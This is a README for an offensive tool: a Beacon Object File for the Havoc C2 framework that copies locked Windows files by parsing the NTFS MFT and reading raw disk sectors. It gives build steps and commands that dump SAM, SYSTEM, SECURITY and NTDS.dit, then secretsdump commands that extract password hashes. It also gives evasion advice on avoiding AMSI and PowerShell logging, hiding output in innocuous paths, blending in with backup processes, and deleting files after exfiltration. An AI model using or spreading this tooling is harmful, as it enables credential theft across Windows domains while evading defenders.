Beacon Object File (BOF) for Havoc that copies locked/in-use system files (registry hives, NTDS.dit, etc.) by parsing the NTFS MFT and reading raw volume sectors, without using VSS, Registry APIs, or standard file I/O.
This is a port of kfallahi's UnderlayCopy PowerShell script (MFT mode) to a native BOF, removing the PowerShell dependency and significantly reducing the detection surface.
- Enables
SeBackupPrivilegeon the current token viaNtAdjustPrivilegesToken - Retrieves the MFT record number of the target file via
GetFileInformationByHandle - Opens the volume
\\.\C:with synchronousGENERIC_READ - Reads the NTFS boot sector to obtain
clusterSizeand the$MFToffset - Reads
$MFTrecord 0 and parses its data runs (the MFT is not contiguous on disk) - Translates the target MFT record number to a real LCN using the
$MFTrun map - Reads the target file's MFT record and parses its
$DATAattribute and data runs - Reads raw clusters from disk and writes them to the destination file
- Local Administrator (elevated) — SYSTEM is not required
SeBackupPrivilegeavailable in the token (default for elevated processes)- NTFS volume (not FAT32 or ReFS)
- Havoc C2 framework
UnderlayCopy_bof/
├── Underlay_bof.c # BOF source code
├── Underlay_bof.py # Havoc command registration script
├── Makefile # Cross-compilation with mingw-w64
├── beacon.h # Havoc BOF API header
└── README.md
# Requirements: mingw-w64
sudo apt install mingw-w64
# Compile
make clean && make
# Output: Underlay_bof.oCompiler: x86_64-w64-mingw32-gcc
Notable flags:
-fno-asynchronous-unwind-tables— removes.eh_framesection-fno-ident— removes compiler metadata-Os— optimize for size
Load the script in Havoc:
Script Manager → Load → Underlay_bof.py
Run from the agent console:
stealthcopy <source> <destination>
# Dump local account hashes
stealthcopy C:\Windows\System32\config\SAM C:\Temp\out.sam
stealthcopy C:\Windows\System32\config\SYSTEM C:\Temp\out.system
stealthcopy C:\Windows\System32\config\SECURITY C:\Temp\out.security
# Dump Active Directory database (on a DC)
stealthcopy C:\Windows\NTDS\NTDS.dit C:\Temp\out.dit
# Local accounts
secretsdump.py -sam out.sam -system out.system -security out.security LOCAL
# Domain accounts (NTDS)
secretsdump.py -ntds out.dit -system out.system LOCAL✅ = better for OPSEC (stealthier / fewer privileges)
❌ = worse for OPSEC (more detectable / more intrusive)
⚠️ = noisy behavior but required
| Artifact | PS1 (kfallahi) | This BOF ⭐️ |
|---|---|---|
| AMSI scan | ❌ detectable | ✅ stealth |
| ScriptBlock Logging (EID 4104) | ❌ detectable | ✅ stealth |
powershell.exe process |
❌ visible | ✅ no PS |
Registry APIs (RegSaveKeyEx) |
✅ safe | ✅ safe |
Raw volume read (\\.\C:) |
||
| Requires SYSTEM | ✅ no | ✅ no |
Destination path — avoid obvious locations:
# Bad
C:\Temp\SAM
# Better
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\<guid>.tmp
Execution context — running from a process that legitimately performs backup I/O (e.g. a backup agent running as SYSTEM) makes the pattern indistinguishable from normal activity.
Clean up — delete the output file after exfiltration:
stealthcopy C:\Windows\System32\config\SAM C:\Temp\out.tmp
download C:\Temp\out.tmp
shell del /f C:\Temp\out.tmp
Credential Guard protects in-memory credentials in lsass.exe. It has no effect on filesystem-level access — this technique reads files from disk and is not affected by Credential Guard.
- Volume hardcoded to
C:— modifyvol[]in the source for other drive letters - Does not support Alternate Data Streams (ADS)
- MFT record size assumed to be 1024 bytes (standard on all modern NTFS volumes)
- Does not apply MFT fixups (Update Sequence Array) — works correctly in practice but may fail on heavily fragmented records
Based on UnderlayCopy by @kfallahi — MFT mode ported to a Havoc BOF.